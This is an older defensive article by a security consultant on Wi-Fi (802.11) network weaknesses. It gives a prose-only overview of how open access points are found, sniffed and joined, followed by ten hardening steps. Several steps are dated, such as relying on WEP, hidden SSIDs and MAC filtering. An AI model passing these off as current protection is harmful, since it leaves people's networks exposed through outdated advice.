Wireless Insecurities Aren't Going Away - But That's Okay

By Kevin Beaver, CISSP

The latest craze in IT is to deploy IEEE 802.11-based wireless local area networks (WLANs). Vendors are touting how WLANs can increase productivity in the workplace and users shouting how they want more freedom to roam around the office. As with most newfound technologies, everyone from corporate executives to small business owners are reading about these wireless perks and, as we've come to discover, people everywhere are setting up wireless network connectivity wherever they can find an available network drop.

It's no secret that the growing WLAN industry has had its stumbling blocks. It seems that a major security vulnerability has been found every few weeks since 802.11b WLANs started becoming popular back in the year 2000. Although the various 802.11 security concerns have made many people think twice about integrating WLANs into their environment, it hasn't stopped most people who are interested in the technology and believe it does indeed offer business value. That's a good thing because the problems aren't as serious as they're made out to be; that is, if security is taken seriously.

Why Wireless Security Is a Problem
The underlying security issue with WLANs is the fact that there are no physical boundaries protecting the network like we have with our traditional wired counterparts. Radio signals leak out into parking lots and adjacent floors, which makes it tricky to keep the snoopers out. Another issue we face with WLAN security is that we're forced to secure a system that has a weak foundation. The 802.11 standard wasn't built from the ground up to have the utmost in security features. Having said that, it was designed with security in mind - something we can't say for most new technologies and software programs. However, its security still relies on many of the same weak mechanisms that have plagued computers for years - passwords, outdated encryption algorithms, patches, and, worst of all, no security settings enabled by default.

While we're on the subject of wireless vulnerabilities, let's take a look at how a WLAN with common default settings can be easily compromised. Here's a scenario:

1. A new AP is broadcasting its default service set identifier (SSID) out into the air - this is basically the wireless network name that, when programmed into wireless client computers, allows users to connect to the wireless network.
2. Anyone with a wireless computer running stumbling software such as Network Stumbler, a wireless network analyzer (a.k.a. sniffer) such as AiroPeek, wireless client management software that came with their wireless card, or just Windows XP can see this SSID and attach to the network. Technically, the SSID doesn't even have to be broadcast to be captured, but I'll keep this simple.
3. The broadcasting of the SSID is facilitated by the use of an omni-directional antenna - which practically all APs have by default. This antenna sends out radio signals in every direction - including nearby parking lots, buildings, and streets, making it easier for a malicious hacker to grab the SSID out of the air.
4. At this point, the hacker can capture packets out of the air using a wireless sniffer and see anything and everything going across the WLAN - emails, web traffic, files being saved to the network, the options are endless.
5. If the hacker wants to hop onto the network and browse around on workstations, servers, or even the Internet, all he has to do is grab an IP address for his computer. This process is usually facilitated by an internal DHCP server that's handing out addresses freely or even by the AP itself.

That's all there is to someone connecting to a vulnerable WLAN. The sad thing is that this is going on all over the world - all day, every day. Computers are getting broken into, information integrity is being compromised, confidential information is being stolen, bandwidth is being consumed, and spam and other illegal servers are being set up and run across these compromised networks. Just imagine the possibilities. Imagine the liabilities!

If MAC address filtering was enabled on this AP, which only allows certain computers to attach to the WLAN, it can be defeated fairly easily by an attacker programming his wireless card to use a valid MAC address he finds by sniffing the airwaves. This still adds a layer of security. If WEP encryption was enabled, the attacker can capture wireless packets and eventually crack the encryption key, but this is yet another layer of protection. If Wi-Fi Protected Access (WPA) or WPA version 2 (also known as 802.11i) are enabled, then pretty much all bets are off, especially if these mechanisms are layered on top of the previously mentioned security options.

So, having said all this, if all 802.11-supported security features were enabled on WLAN devices out of the box, we wouldn't have the common security problems we see with the majority of wireless installations. The problem is that the WLAN vendors don't (and probably never will) enable all the security features that are available. They're focusing on basic feature sets, time to market, and ease of use. The onus to secure wireless systems is placed on the end user, which, as we're now seeing, is rarely a good idea. It's easy to comment on this issue, but, all things considered, there's not a great solution - especially now that the cat's out of the bag so to speak. Let's look at some basic remedies to this problem.

The Technical Fixes Are Pretty Simple
With regard to wireless security, the focus should be on three main areas:

1. Securing APs
2. Securing wireless clients
3. Securing the traffic between the two

It seems complex at first, but it's actually really easy to address these areas and set up a secure WLAN. Here are ten simple steps for doing this that you can perform yourself if you'd like. All it takes are your wireless user's guides for specific instructions and some basic computer knowledge.

1. Change the default SSID on your APs - make it something obscure that doesn't give away any private information relating to what it's used for, such as department, company name, etc.
2. Disable the broadcasting of the SSID. Most enterprise-worthy APs have this feature. Your legitimate wireless clients don't even need to have the SSID broadcast since you know what it is anyway when it comes time to getting them on the network.
3. Change default passwords and IP addresses. This in itself can eliminate a large portion of your vulnerabilities.
4. Replace each of your omni-directional antennas with directional antennas wherever possible. This will keep your wireless radio waves from going where they don't belong.
5. Reduce the transmission power of the radio signals in your APs if possible. Choose the lowest setting that allows proper coverage and throughput.
6. Place your APs in a protected network - either outside your firewall or in a DMZ. Never place an AP behind the firewall if you can help it, otherwise it can completely negate the benefits of the firewall.
7. Enable MAC address controls on your AP if you have a reasonably small WLAN. Otherwise, this can be too difficult to manage.
8. Enable WEP encryption with a difficult-to-guess passphrase and change this passphrase on a regular basis.
9. Apply the latest firmware patches to your APs on a regular basis.
10. Install personal firewall software on your wireless clients and ensure they're patched on a regular basis.

If you want the utmost in security, you can enable WPA or WPA2 if your hardware supports it.

That's it - regardless of what the WLAN vendors claim, reasonable WLAN security can be attained even if you just go with the basics. Doing so will put you way ahead of the crowd so when an attacker does come your way, he'll likely go down the path of least resistance - that is, someone else's WLAN that doesn't have these settings enabled and is much easier to break into. Don't get me wrong - I'm not saying that your WLAN will be completely impenetrable to someone that's determined enough - but time is on your side. The more layers of security (or hoops to jump through) you set up, the more difficult it will be and the more time it will take a hacker to break in. If you tire them out enough, they'll likely move on to someone else.

Inherent Weaknesses Are Here to Stay
Even if we worked in an ideal world and all known 802.11 security vulnerabilities went away, we'd still have the human factor to deal with. It's easy for us to blame technical security problems on inanimate objects like APs and wireless laptops, but the true problem lies within ourselves. Human oversight, error, and carelessness lie at the root of most information security issues. With employees installing rogue APs on corporate networks, technicians installing the wrong type of antennas that send wireless signals outside their buildings, and network administrators forgetting to enable even the most basic wireless security features in the first place, we have much bigger problems to worry about than whether or not WEP encryption can be cracked, some authentication system can be broken, or wireless radio signals can be jammed.

Inherent WLAN weaknesses are here to stay, but that's quite alright. If you take reasonable and practical precautions, you'll be ahead of the curve and less of a target moving forward. A great quote from Chuck Yeager applies to WLAN security: "You don't concentrate on risks. You concentrate on results. No risk is too great to prevent the necessary job from getting done." If you need wireless network connectivity inside your organization, go for it! If you proceed with caution, take reasonable steps towards implementing the security basics, remember the human factors that pose the greatest risks, and remain vigilant, you'll be quite alright.

About the Author
Kevin Beaver is an independent information security consultant, author, and speaker with Atlanta-based Principle Logic, LLC where he specializes in information security assessments for those who take security seriously and incident response for those who don't. He is author of the highly-successful book Hacking For Dummies and co-author of the new book Hacking Wireless Networks For Dummies, both by Wiley Publishing. Kevin also wrote the free ebook The Definitive Guide to Email Management and Security by Realtimepublishers.com and co-authored the book The Practical Guide to HIPAA Privacy and Security Compliance by Auerbach Publications. He can be reached at kbeaver@principlelogic.com.